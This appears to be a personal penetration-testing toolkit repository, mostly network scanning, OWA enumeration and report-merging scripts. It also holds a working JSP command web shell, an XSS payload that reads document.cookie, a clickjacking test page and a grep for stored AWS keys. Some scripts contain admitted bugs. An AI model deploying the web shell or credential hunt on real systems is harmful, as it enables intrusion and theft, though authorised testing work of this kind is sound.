├── .gitattributes ├── .gitignore ├── ApachePhishMetrics.sh ├── LinuxPostexGrep.txt ├── README.md ├── VMManage ├── CreateVMSnapshot.sh └── ListVMSnapshots.sh ├── VerifyAzureStorage.ps1 ├── WIP ├── discovery.py └── owa_enum.py ├── XSS.JS ├── framing-test.html ├── hsts-check.py ├── jsp_cmd_shell.jsp ├── nessus_merge.py ├── network_enum.sh ├── network_services_hostlists.sh └── swagger_parse.py /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | *.sln merge=union 7 | *.csproj merge=union 8 | *.vbproj merge=union 9 | *.fsproj merge=union 10 | *.dbproj merge=union 11 | 12 | # Standard to msysgit 13 | *.doc diff=astextplain 14 | *.DOC diff=astextplain 15 | *.docx diff=astextplain 16 | *.DOCX diff=astextplain 17 | *.dot diff=astextplain 18 | *.DOT diff=astextplain 19 | *.pdf diff=astextplain 20 | *.PDF diff=astextplain 21 | *.rtf diff=astextplain 22 | *.RTF diff=astextplain 23 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ################# 2 | ## Eclipse 3 | ################# 4 | 5 | *.pydevproject 6 | .project 7 | .metadata 8 | bin/ 9 | tmp/ 10 | *.tmp 11 | *.bak 12 | *.swp 13 | *~.nib 14 | local.properties 15 | .classpath 16 | .settings/ 17 | .loadpath 18 | 19 | # External tool builders 20 | .externalToolBuilders/ 21 | 22 | # Locally stored "Eclipse launch configurations" 23 | *.launch 24 | 25 | # CDT-specific 26 | .cproject 27 | 28 | # PDT-specific 29 | .buildpath 30 | 31 | 32 | ################# 33 | ## Visual Studio 34 | ################# 35 | 36 | ## Ignore Visual Studio temporary files, build results, and 37 | ## files generated by popular Visual Studio add-ons. 38 | 39 | # User-specific files 40 | *.suo 41 | *.user 42 | *.sln.docstates 43 | 44 | # Build results 45 | 46 | [Dd]ebug/ 47 | [Rr]elease/ 48 | x64/ 49 | build/ 50 | [Bb]in/ 51 | [Oo]bj/ 52 | 53 | # MSTest test Results 54 | [Tt]est[Rr]esult*/ 55 | [Bb]uild[Ll]og.* 56 | 57 | *_i.c 58 | *_p.c 59 | *.ilk 60 | *.meta 61 | *.obj 62 | *.pch 63 | *.pdb 64 | *.pgc 65 | *.pgd 66 | *.rsp 67 | *.sbr 68 | *.tlb 69 | *.tli 70 | *.tlh 71 | *.tmp 72 | *.tmp_proj 73 | *.log 74 | *.vspscc 75 | *.vssscc 76 | .builds 77 | *.pidb 78 | *.log 79 | *.scc 80 | 81 | # Visual C++ cache files 82 | ipch/ 83 | *.aps 84 | *.ncb 85 | *.opensdf 86 | *.sdf 87 | *.cachefile 88 | 89 | # Visual Studio profiler 90 | *.psess 91 | *.vsp 92 | *.vspx 93 | 94 | # Guidance Automation Toolkit 95 | *.gpState 96 | 97 | # ReSharper is a .NET coding add-in 98 | _ReSharper*/ 99 | *.[Rr]e[Ss]harper 100 | 101 | # TeamCity is a build add-in 102 | _TeamCity* 103 | 104 | # DotCover is a Code Coverage Tool 105 | *.dotCover 106 | 107 | # NCrunch 108 | *.ncrunch* 109 | .*crunch*.local.xml 110 | 111 | # Installshield output folder 112 | [Ee]xpress/ 113 | 114 | # DocProject is a documentation generator add-in 115 | DocProject/buildhelp/ 116 | DocProject/Help/*.HxT 117 | DocProject/Help/*.HxC 118 | DocProject/Help/*.hhc 119 | DocProject/Help/*.hhk 120 | DocProject/Help/*.hhp 121 | DocProject/Help/Html2 122 | DocProject/Help/html 123 | 124 | # Click-Once directory 125 | publish/ 126 | 127 | # Publish Web Output 128 | *.Publish.xml 129 | *.pubxml 130 | 131 | # NuGet Packages Directory 132 | ## TODO: If you have NuGet Package Restore enabled, uncomment the next line 133 | #packages/ 134 | 135 | # Windows Azure Build Output 136 | csx 137 | *.build.csdef 138 | 139 | # Windows Store app package directory 140 | AppPackages/ 141 | 142 | # Others 143 | sql/ 144 | *.Cache 145 | ClientBin/ 146 | [Ss]tyle[Cc]op.* 147 | ~$* 148 | *~ 149 | *.dbmdl 150 | *.[Pp]ublish.xml 151 | *.pfx 152 | *.publishsettings 153 | 154 | # RIA/Silverlight projects 155 | Generated_Code/ 156 | 157 | # Backup & report files from converting an old project file to a newer 158 | # Visual Studio version. Backup files are not needed, because we have git ;-) 159 | _UpgradeReport_Files/ 160 | Backup*/ 161 | UpgradeLog*.XML 162 | UpgradeLog*.htm 163 | 164 | # SQL Server files 165 | App_Data/*.mdf 166 | App_Data/*.ldf 167 | 168 | ############# 169 | ## Windows detritus 170 | ############# 171 | 172 | # Windows image file caches 173 | Thumbs.db 174 | ehthumbs.db 175 | 176 | # Folder config file 177 | Desktop.ini 178 | 179 | # Recycle Bin used on file shares 180 | $RECYCLE.BIN/ 181 | 182 | # Mac crap 183 | .DS_Store 184 | 185 | 186 | ############# 187 | ## Python 188 | ############# 189 | 190 | *.py[co] 191 | 192 | # Packages 193 | *.egg 194 | *.egg-info 195 | dist/ 196 | build/ 197 | eggs/ 198 | parts/ 199 | var/ 200 | sdist/ 201 | develop-eggs/ 202 | .installed.cfg 203 | 204 | # Installer logs 205 | pip-log.txt 206 | 207 | # Unit test / coverage reports 208 | .coverage 209 | .tox 210 | 211 | #Translations 212 | *.mo 213 | 214 | #Mr Developer 215 | .mr.developer.cfg 216 | -------------------------------------------------------------------------------- /ApachePhishMetrics.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | ##Justin Soderbeg 5 | # using this: 6 | # put all the apache logs you want to processes into the same directory 7 | # 'cd' into that directory and run the script 8 | # should output .txt files containing the information needed 9 | 10 | 11 | #total hits to the first page 12 | echo "#These are the unique visits to the site" > site_metrics.txt 13 | echo "
" >> site_metrics.txt 14 | less ssl_access_log* | grep "/ " | cut -d '-' -f 1 | sort -r | uniq -c | grep -v -E '10.8.161.*|10.18.28.*' >> site_metrics.txt 15 | 16 | 17 | 18 | #unique visits to the sites main survey page 19 | echo "" >> site_metrics.txt 20 | echo "" >> site_metrics.txt 21 | echo "" >> site_metrics.txt 22 | echo "#These are the unique visits to the site that started the survey" >> site_metrics.txt 23 | echo "
" >> site_metrics.txt 24 | less ssl_access_log* | grep "survey.php" | cut -d '-' -f 1 | sort -r | uniq -c | grep -v -E '10.8.161.*|10.18.28.*' >> site_metrics.txt 25 | 26 | 27 | 28 | #unique visits to the thank you page 29 | echo "" >> site_metrics.txt 30 | echo "" >> site_metrics.txt 31 | echo "" >> site_metrics.txt 32 | echo "#These are the unique visits that finished the survey" >> site_metrics.txt 33 | echo "
" >> site_metrics.txt 34 | less ssl_access_log* | grep "thankyou.php" | cut -d '-' -f 1 | sort -r | uniq -c | grep -v -E '10.8.161.*|10.18.28.*' >> site_metrics.txt 35 | 36 | -------------------------------------------------------------------------------- /LinuxPostexGrep.txt: -------------------------------------------------------------------------------- 1 | # Find stored aws keys from user home dirs 2 | grep -E "((access|secret)\-*\_*key)" -R . 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Most of these are written for Kali 2 | 3 | 4 | some of these are a work in progress and do not function as-is because they were completed elsewhere and not re committed or I just gave up on them due to other time commitments. Feel free to fix/issue pull requests for anything. I make no promises for functionality or support. 5 | -------------------------------------------------------------------------------- /VMManage/CreateVMSnapshot.sh: -------------------------------------------------------------------------------- 1 | 2 | #!/bin/sh 3 | 4 | # Creates a snapshot of specific in VirtualBox. The name is the timestamp. 5 | # this was created to give an easy way to repeat VM snapshots of a single vm during a course 6 | 7 | 8 | FORMATTED_DATE="PWK-$(date | awk '{gsub(/[ \t]/,"-");print}')-snapshot" 9 | 10 | # Modify VM_IDS of the specific vm you want to create a snapshot of 11 | # found with `VBoxManage list vm` 12 | VM_IDS="c31f7321-6287-49fe-8f3e-31d71cf55565" 13 | 14 | 15 | COMMAND="VBoxManage snapshot "$VM_IDS" take "$FORMATTED_DATE" --live" 16 | echo $COMMAND 17 | eval $COMMAND 18 | logger "From $0 - Created VirtualBox Snapshot $FORMATTED_DATE for VM $NEXT" 19 | echo "Created VirtualBox Snapshot $FORMATTED_DATE for VM $NEXT" 20 | printf "\n\n" 21 | -------------------------------------------------------------------------------- /VMManage/ListVMSnapshots.sh: -------------------------------------------------------------------------------- 1 | 2 | #!/bin/sh 3 | 4 | # Lists snapshots of All VMs in VirtualBox. 5 | 6 | 7 | echo "These are the VMs that will be listed" 8 | VBoxManage list vms 9 | printf "\n" 10 | 11 | #VM_IDS="c31f7321-6287-49fe-8f3e-31d71cf55565" 12 | for vm in `(VBoxManage list vms | cut -d "{" -f2 | cut -d "}" -f1)`; do 13 | COMMAND="VBoxManage snapshot "$vm" list" 14 | echo $COMMAND 15 | eval $COMMAND 16 | logger "From $0 - Listin VirtualBox Snapshots for PWK VM" 17 | printf "\n" 18 | done 19 | -------------------------------------------------------------------------------- /VerifyAzureStorage.ps1: -------------------------------------------------------------------------------- 1 | #Justin Soderberg 2 | #quick wrapper for the Azure powershell tools to verify if a connection string is valid 3 | 4 | Param( 5 | [Parameter(Mandatory=$true)] 6 | [string]$StorageAccountName, 7 | [Parameter(Mandatory=$true)] 8 | [string]$StorageAccountKey 9 | ) 10 | if (Get-Module -ListAvailable -Name Azure){ 11 | Try{ 12 | $Context = New-AzureStorageContext -StorageAccountName $StorageAccountName -StorageAccountKey $StorageAccountKey 13 | Get-AzureStorageContainer -Context $Context 14 | } 15 | Catch{ 16 | Write-Host "An errors occured verify your name and key" 17 | } 18 | }else{ 19 | Write-Host "Azure Module does not exist" 20 | } 21 | -------------------------------------------------------------------------------- /WIP/discovery.py: -------------------------------------------------------------------------------- 1 | #A blanket discovery script to help with enumberation 2 | 3 | 4 | 5 | 6 | #TODOs 7 | #nmap ping scan 8 | #Metasploit UDP Probe 9 | #nmap -T4 -sS -sV -sC -T5 -PP -PE -PM -PI -PA20,53,80,113,443,5060,10043 --host-timeout=300m -O --max-rtt-timeout=3000ms --initial-rtt-timeout=1000ms --min-rtt-timeout=1000ms --max-retries=2 --stats-every 10s --traceroute --min-hostgroup=64 -PS1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,873,888,902,910,912,921,993,995,998,1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,4000,4322,4433,4444-4445,4659,4672,4679,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,6000,6050,6060,6070,6080,6101,6106,6112,6262,6379,6405,6502-6504,6542,6660-6661,6667,6905,6988,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7579-7580,7700,7770,7777-7778,7787,7800-7801,7879,7902,8000-8001,8008,8014,8020,8023,8028,8030,8080-8082,8086-8087,8090,8095,8161,8180,8205,8222,8300,8303,8333,8400,8443-8444,8503,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,9000,9002,9010,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9390-9391,9495,9788,9809-9815,9855,9999-10001,10008,10050-10051,10080,10098,10162,10202-10203,10443,10616,10628,11000,11099,11211,11234,11333,12174,12203,12221,12345,12397,12401,13364,13500,13838,14330,15200,16102,17185,17200,18881,19300,19810,20010,20031,20034,20101,20111,20171,20222,22222,23472,23791,23943,25000,25025,26000,26122,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32764,32913,34205,34443,37718,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50500-50504,52302,52869,55553,57772,62078,62514,65535 --min-rate=500 -PU56838 -iL -p1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,873,888,902,910,912,921,993,995,998,1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,4000,4322,4433,4444-4445,4659,4672,4679,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,6000,6050,6060,6070,6080,6101,6106,6112,6262,6379,6405,6502-6504,6542,6660-6661,6667,6905,6988,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7579-7580,7700,7770,7777-7778,7787,7800-7801,7879,7902,8000-8001,8008,8014,8020,8023,8028,8030,8080-8082,8086-8087,8090,8095,8161,8180,8205,8222,8300,8303,8333,8400,8443-8444,8503,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,9000,9002,9010,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9390-9391,9495,9788,9809-9815,9855,9999-10001,10008,10050-10051,10080,10098,10162,10202-10203,10443,10616,10628,11000,11099,11211,11234,11333,12174,12203,12221,12345,12397,12401,13364,13500,13838,14330,15200,16102,17185,17200,18881,19300,19810,20010,20031,20034,20101,20111,20171,20222,22222,23472,23791,23943,25000,25025,26000,26122,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32764,32913,34205,34443,37718,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823,46824,47001,47002,48080,48899,49152,50000-50004,50013,50500,50504,52302,52869,55553,57772,62078,62514,65535 --script smb-security-mode, ssl-cipher-enum, "discovery", "safe", "vuln" 10 | 11 | #Metasploit SMB Share Enum 12 | #Metasploit SMB User Enum 13 | #SNMP scanner (either metasploit,SNMP walk, onesixtyone) 14 | #Anonymous FTP Check 15 | #SSL Scan 16 | 17 | ###### SCRIPT ############ 18 | 19 | #pf = /tmp/nmap-ping-$(date +%Y%m%d) 20 | #muf = /tmp/msf-udp-$(date +%Y%m%d) 21 | 22 | 23 | #if (uuid != 0) do 24 | # print "please run as sudo" 25 | # exit(0) 26 | #fi 27 | 28 | #nmap -sn $1 > $pf 29 | 30 | 31 | import python-nmap 32 | 33 | 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /WIP/owa_enum.py: -------------------------------------------------------------------------------- 1 | #!/bin/python3 2 | 3 | # Author: Justin Soderberg 4 | # Prompted idea taken from \ 5 | # https://www.peerlyst.com/posts/writing-a-simple-owa-enumeration-script-secgroundzero 6 | 7 | import argparse 8 | import requests 9 | 10 | 11 | # List of OWA discovery paths to check 12 | owaDiscoveryPaths = ['/autodiscover/autodiscover.xml', '/Autodiscover/Autodiscover.xml', '/owa/auth/logon.aspx'] 13 | 14 | # List of subdomains to check 15 | subdomains = ['www', 'autodiscover', 'mail', 'exchange', 'webmail'] 16 | 17 | # Check if a URL returns a successful HTTP status code 18 | def checkURL(url): 19 | try: 20 | response = requests.get(url) 21 | return response.status_code == 200 22 | except: 23 | return False 24 | 25 | # Check if a live OWA or Exchange instance exists for the given domain 26 | def checkDomain(domain): 27 | for sub in subdomains: 28 | for path in owaDiscoveryPaths: 29 | # Construct the URL to check 30 | url = f'https://{sub}.{domain}{path}' 31 | if checkURL(url): 32 | print(f'[+] {url} exists!') 33 | return True 34 | return False 35 | 36 | def main(): 37 | # Parse command-line arguments 38 | parser = argparse.ArgumentParser(description='Check for a live OWA or Exchange instance') 39 | parser.add_argument('-d', '--domain', type=str, help='Add a domain') 40 | args = parser.parse_args() 41 | 42 | # Check the provided domain for a live OWA or Exchange instance 43 | domain = args.domain 44 | if checkDomain(domain): 45 | print(f'Live OWA or Exchange instance found for {domain}!') 46 | else: 47 | print(f'No live OWA or Exchange instance found for {domain}!') 48 | 49 | if __name__ == "__main__": 50 | main() 51 | -------------------------------------------------------------------------------- /XSS.JS: -------------------------------------------------------------------------------- 1 | /* This file is based on the file from http://ha.ckers.org/xss.js and xss.rocks/xss.js*/ 2 | 3 | document.write ("This is remote text via XSS.JS located on the github of Justin Soderberg " + document.cookie); 4 | alert("Remote XSS Inclusion " + document.cookie); 5 | -------------------------------------------------------------------------------- /framing-test.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Clickjacking Successful 4 | 5 | 6 |

This page is vulnerable to clickjacking

7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /hsts-check.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # may need to pip install requests if it's a clean system 4 | 5 | import requests 6 | 7 | sites = [ 8 | ('Facebook', 'https://www.facebook.com') 9 | ] 10 | 11 | for site in sites: 12 | r = requests.get(site[1], headers={ 13 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0'}) 14 | if 'strict-transport-security' in r.headers: 15 | print(site[0] + ': Headers Present [' + 16 | r.headers['strict-transport-security'] + ']') 17 | else: 18 | print(site[0] + ': No HSTS Headers Present') 19 | -------------------------------------------------------------------------------- /jsp_cmd_shell.jsp: -------------------------------------------------------------------------------- 1 | <%-- this should work but i don't guarantee anything and am not responsible for where this is used--%> 2 | 3 | <%@ page import="java.util.*,java.io.*"%> 4 | 5 | Commands with JSP 6 |

7 | 8 | 9 |
10 |
11 | <%
12 | if (request.getParameter("command") != null) {
13 |         out.println("Command: " + request.getParameter("command") + "
"); 14 | Process p = Runtime.getRuntime().exec(request.getParameter("command")); 15 | OutputStream os = p.getOutputStream(); 16 | InputStream in = p.getInputStream(); 17 | DataInputStream dis = new DataInputStream(in); 18 | String disr = dis.readLine(); 19 | while ( disr != null ) { 20 | out.println(disr); 21 | disr = dis.readLine(); 22 | } 23 | } 24 | %> 25 |
26 | 27 | -------------------------------------------------------------------------------- /nessus_merge.py: -------------------------------------------------------------------------------- 1 | # based off: https://gist.github.com/mastahyeti/2720173 2 | #only slight modifications 3 | 4 | import os 5 | import shutil 6 | import xml.etree.ElementTree as etree 7 | 8 | first = 1 9 | for fileName in os.listdir("."): 10 | if ".nessus" in fileName: 11 | print(":: Parsing", fileName) 12 | if first: 13 | mainTree = etree.parse(fileName) 14 | report = mainTree.find('Report') 15 | report.attrib['name'] = 'Merged Report' 16 | first = 0 17 | else: 18 | tree = etree.parse(fileName) 19 | for host in tree.findall('.//ReportHost'): 20 | existing_host = report.find(".//ReportHost[@name='" + host.attrib['name'] + "']") 21 | if not existing_host: 22 | print "adding host: " + host.attrib['name'] 23 | report.append(host) 24 | else: 25 | for item in host.findall('ReportItem'): 26 | if not existing_host.find("ReportItem[@port='" + item.attrib['port'] + "'][@pluginID='" + 27 | item.attrib['pluginID'] + "']"): 28 | print "adding finding: " + item.attrib['port'] + ":" + item.attrib['pluginID'] 29 | existing_host.append(item) 30 | print(":: => done.") 31 | 32 | if "merged_nessus_report" in os.listdir("."): 33 | shutil.rmtree("merged_nessus_report") 34 | 35 | os.mkdir("merged_nessus_report") 36 | mainTree.write("merged_nessus_report/merged_report.nessus", encoding="utf-8", xml_declaration=True) 37 | -------------------------------------------------------------------------------- /network_enum.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Author: Justin Soderbeg 3 | # network services script 4 | # network_enum.sh
5 | 6 | # this requires propecia.c: https://packetstormsecurity.com/files/14232/propecia.c.html 7 | 8 | Make the directories 9 | mkdir -p ~/$1/internal/scan/services/ 10 | mkdir -p ~/$1/internal/scan/nmap/hosts/ 11 | 12 | 13 | 14 | ###################### 15 | # Find Windows Hosts # 16 | ###################### 17 | echo "Scanning for windows hosts." 18 | WIN_SMB_COUNTER=0 19 | while [ $WIN_SMB_COUNTER -lt 254 ]; do 20 | propecia $2.$WIN_SMB_COUNTER 445 >> ~/$1/internal/scan/services/windows_SMB_hosts 21 | let WIN_SMB_COUNTER++ 22 | done 23 | echo "Done scanning for windows smb hosts. RDP is next." 24 | 25 | ###################### 26 | # Find Windows RDP Hosts # 27 | ###################### 28 | echo "Scanning for windows hosts." 29 | WIN_RDP_COUNTER=0 30 | while [ $WIN_COUNTER -lt 254 ]; do 31 | propecia $2.$WIN_RDP_COUNTER 3389 >> ~/$1/internal/scan/services/windows_RDP_hosts 32 | let WIN_RDP_COUNTER++ 33 | done 34 | echo "Done scanning for windows RDP hosts. FTP is next." 35 | 36 | ################## 37 | # Find FTP Hosts # 38 | ################## 39 | FTP_COUNTER=0 40 | while [ $FTP_COUNTER -lt 254 ]; do 41 | propecia $2.$FTP_COUNTER 21 >> ~/$1/internal/scan/services/ftp_hosts 42 | let FTP_COUNTER++ 43 | done 44 | echo "Done scanning for FTP hosts. SunRPC is next." 45 | 46 | 47 | ##################### 48 | # Find SunRPC Hosts # 49 | ##################### 50 | SRPC_COUNTER=0 51 | while [ $SRPC_COUNTER -lt 254 ]; do 52 | propecia $2.$SRPC_COUNTER 111 >> ~/$1/internal/scan/services/sunrpc_hosts 53 | let SRPC_COUNTER++ 54 | done 55 | 56 | echo "Done scanning for SunRPC hosts. Telnet is next." 57 | 58 | 59 | ##################### 60 | # Find Telnet Hosts # 61 | ##################### 62 | TEL_COUNTER=0 63 | while [ $TEL_COUNTER -lt 254 ]; do 64 | propecia $2.$TEL_COUNTER 23 >> ~/$1/internal/scan/services/telnet_hosts 65 | let TEL_COUNTER++ 66 | done 67 | echo "Done scanning for Telnet hosts. Databases are next." 68 | 69 | 70 | ################## 71 | # Find Databases # 72 | ################## 73 | MSSQL_COUNTER=0 74 | while [ $MSSQL_COUNTER -lt 254 ]; do 75 | propecia $2.$MSSQL_COUNTER 1433 >> ~/$1/internal/scan/services/mssql_hosts 76 | let MSSQL_COUNTER++ 77 | done 78 | 79 | ORA_COUNTER=0 80 | while [ $ORA_COUNTER -lt 254 ]; do 81 | propecia $2.$ORA_COUNTER 1521 >> ~/$1/internal/scan/services/oracle_hosts 82 | let ORA_COUNTER+ 83 | done 84 | 85 | 86 | MY_COUNTER=0 87 | while [ $MY_COUNTER -lt 254 ]; do 88 | propecia $2.$MY_COUNTER 3306 >> ~/$1/internal/scan/services/mysql_hosts 89 | let MY_COUNTER++ 90 | done 91 | echo "Done scanning for Databases. Scanning for Web Servers Next" 92 | 93 | ################ 94 | # Find HTTP 80 # 95 | ################ 96 | HTTP_80_COUNTER=0 97 | while [ $HTTP_80_COUNTER -lt 254 ]; do 98 | propecia $2.$HTTP_80_COUNTER 80 >> ~/$1/internal/scan/services/http_80_hosts 99 | let HTTP_80_COUNTER++ 100 | done 101 | ################## 102 | # Find HTTP 8080 # 103 | ################## 104 | HTTP_8080_COUNTER=0 105 | while [ $HTTP_8080_COUNTER -lt 254 ]; do 106 | propecia $2.$HTTP_8080_COUNTER 80 >> ~/$1/internal/scan/services/http_8080_hosts 107 | let HTTP_8080_COUNTER++ 108 | done 109 | ################# 110 | # Find HTTP 443 # 111 | ################# 112 | HTTP_443_COUNTER=0 113 | while [ $HTTP_443_COUNTER -lt 254 ]; do 114 | propecia $2.$HTTP_443_COUNTER 80 >> ~/$1/internal/scan/services/http_443_hosts 115 | let HTTP_443_COUNTER++ 116 | done 117 | ################## 118 | # Find HTTP 8443 # 119 | ################## 120 | HTTP_8443_COUNTER=0 121 | while [ $HTTP_8443_COUNTER -lt 254 ]; do 122 | propecia $2.$HTTP_8443_COUNTER 80 >> ~/$1/internal/scan/services/http_8443_hosts 123 | let HTTP_8443_COUNTER++ 124 | done 125 | 126 | ###################### 127 | # Merge nmap targets # 128 | ###################### 129 | cat ~/$1/internal/scan/services/windows_hosts ~/$1/internal/scan/services/ftp_hosts ~/$1/internal/scan/services/sunrpc_hosts ~/$1/internal/scan/services/windows_RDP_hosts \ 130 | ~/$1/internal/scan/services/mssql_hosts ~/$1/internal/scan/services/oracle_hosts ~/$1/internal/scan/services/mysql_hosts \ 131 | ~/$1/internal/scan/services/http_80_hosts ~/$1/internal/scan/services/http_8080_hosts ~/$1/internal/scan/services/http_443_hosts ~/$1/internal/scan/services/http_8443_hosts >> ~/$1/internal/scan/nmap/nmap_targets_dup 132 | 133 | ############################ 134 | # Deduplicate nmap targets # 135 | ############################ 136 | sort ~/$1/internal/scan/nmap_targets/nmap_targets_dup | uniq > ~/$1/internal/scan/nmap/nmap_targets_deduplicated 137 | 138 | 139 | ############################### 140 | # Ok, let's do the NMAP files # 141 | ############################### 142 | 143 | for x in `cat ~/$1/internal/scan/nmap_targets/nmap_targets_deduplicated` ; do nmap -sV -O $x > ~/$1/internal/scan/nmap/hosts/$x ; done 144 | echo "Done with Windows." 145 | echo " " 146 | echo " " 147 | echo "Done, now check your results." 148 | -------------------------------------------------------------------------------- /network_services_hostlists.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Author: Justin Soderberg 3 | # This script discovers hosts running specific servers and outputs a host list to a file for each service 4 | # This all relies on standard nmap discovery 5 | 6 | # free for use and modificatiion 7 | 8 | bashversion=$(printf "$BASH_VERSION" | cut -d "." -f1) 9 | 10 | # check that we are running in bash 4 so that associative arrays work 11 | if (($bashversion != "4")); then 12 | printf "Must be running BASH >= 4.0" 13 | exit 14 | fi 15 | 16 | #Check arguments 17 | if (($# != 1)); then 18 | printf "Usage: %s 10.1.1.0/24" "$0" 19 | exit 20 | fi 21 | 22 | # Check Privs 23 | if (($EUID != 0)); then 24 | printf "Run me as Root" 25 | exit 26 | fi 27 | 28 | # declare an associative array 29 | declare -A servicesTCP 30 | declare -A servicesUDP 31 | 32 | # declare services in the arrays 33 | ### 34 | # DECLARE TCP services 35 | ### 36 | # scan for http port 80 37 | servicesTCP[http80]=80 38 | # scan for http port 8080 39 | servicesTCP[http8080]=8080 40 | # scan for https port 443 41 | servicesTCP[https443]=443 42 | # scan for https port 8443 43 | servicesTCP[http8443]=8443 44 | # scan for ftp 45 | servicesTCP[ftp]=21 46 | # scan for ssh 47 | servicesTCP[ssh]=22 48 | # scan for telnet 49 | servicesTCP[telnet]=23 50 | # scan for smtp 51 | servicesTCP[smtp]=25 52 | # scan for smtp using ssl 53 | servicesTCP[smtpssl]=465 54 | # scan for POP 55 | servicesTCP[pop3]=110 56 | # scan for SMB 57 | servicesTCP[smb]=445 58 | 59 | ### 60 | # DECLARE UDP services 61 | ### 62 | # scan for snmp 63 | servicesUDP[snmp]=161 64 | 65 | # make the test directory in whatever folder you are in 66 | # eventually i want to make this more elegant but for now it works. 67 | mkdir -p ./HostServices/ 68 | workingpath="./HostServices/" 69 | 70 | #Text Colors 71 | RED='\033[0;31m' 72 | GREEN='\033[0;32m' 73 | YELLOW='\033[0;33m' 74 | END='\033[0;0m' 75 | BOLD='\033[0;1m' 76 | ENDBOLD='\033[21m' 77 | 78 | for service in "${!servicesTCP[@]}"; do 79 | printf $YELLOW"Testing the %s TCP service\n"$END "$service" 80 | filetemp=$workingpath$service"_hosts.gnmap" 81 | filehosts=$workingpath$service"_hosts.txt" 82 | nmap -p ${servicesTCP[$service]} $1 --open -oG $filetemp 83 | cat $filehosts | cut -d " " -f2 | sort -u | grep -v "Nmap" >$filehosts 84 | printf $GREEN"Testing of the %s TCP service is Complete\n" "$service" 85 | printf "Check the file:"$BOLD" %s"$ENDBOLD$GREEN" for a list of hosts with the service active\n\n"$END "$filehosts" 86 | 87 | done 88 | 89 | for service in "${!servicesUDP[@]}"; do 90 | printf $YELLOW "Testing the %s UDP service\n"$END "$service" 91 | filetemp=$workingpath$service"_hosts.gnmap" 92 | filehosts=$workingpath$service"_hosts.txt" 93 | nmap -sU -p ${servicesUDP[$service]} $1 --open -oG $filetemp 94 | cat $filehosts | cut -d " " -f2 | sort -u | grep -v "Nmap" >$filehosts 95 | printf $GREEN"Testing of the %s UDP service is Complete\n" "$service" 96 | printf "Check the file: "$BOLD" %s"$ENDBOLD$GREEN" for a list of hosts with the service active\n\n"$END "$filehosts" 97 | done 98 | -------------------------------------------------------------------------------- /swagger_parse.py: -------------------------------------------------------------------------------- 1 | #### Author: Justin Soderberg 2 | #### 3 | ## The goal of this script is to parse a swagger.json file a pull out the API path and the HTTP Method 4 | ## then just place it into a table in the termincal. Designed to quickly identify and target services. 5 | #### 6 | 7 | 8 | import sys 9 | from prance import ResolvingParser 10 | from prettytable import PrettyTable 11 | 12 | # Read in the file or URL 13 | SWAGFILE = sys.argv[1] 14 | 15 | # Set all json keys 16 | PATHS = 'paths' 17 | SUMMARY = 'summary' 18 | 19 | 20 | # Parse the swagger file and assign the dicitonary var 21 | PARSER = ResolvingParser(SWAGFILE) 22 | SWAGDICT = PARSER.specification 23 | 24 | # Init the table 25 | TABLE = PrettyTable(["Path", "Method", "Summary"]) 26 | 27 | # Print The table 28 | for PATH in SWAGDICT[PATHS].keys(): 29 | # print(SWAGDICT['basePath'] + key) 30 | for HTTPMETHOD in SWAGDICT[PATHS][PATH].keys(): 31 | summary = SWAGDICT[PATHS][PATH][HTTPMETHOD][SUMMARY] 32 | TABLE.add_row([(SWAGDICT['basePath'] + PATH), HTTPMETHOD, summary]) 33 | print 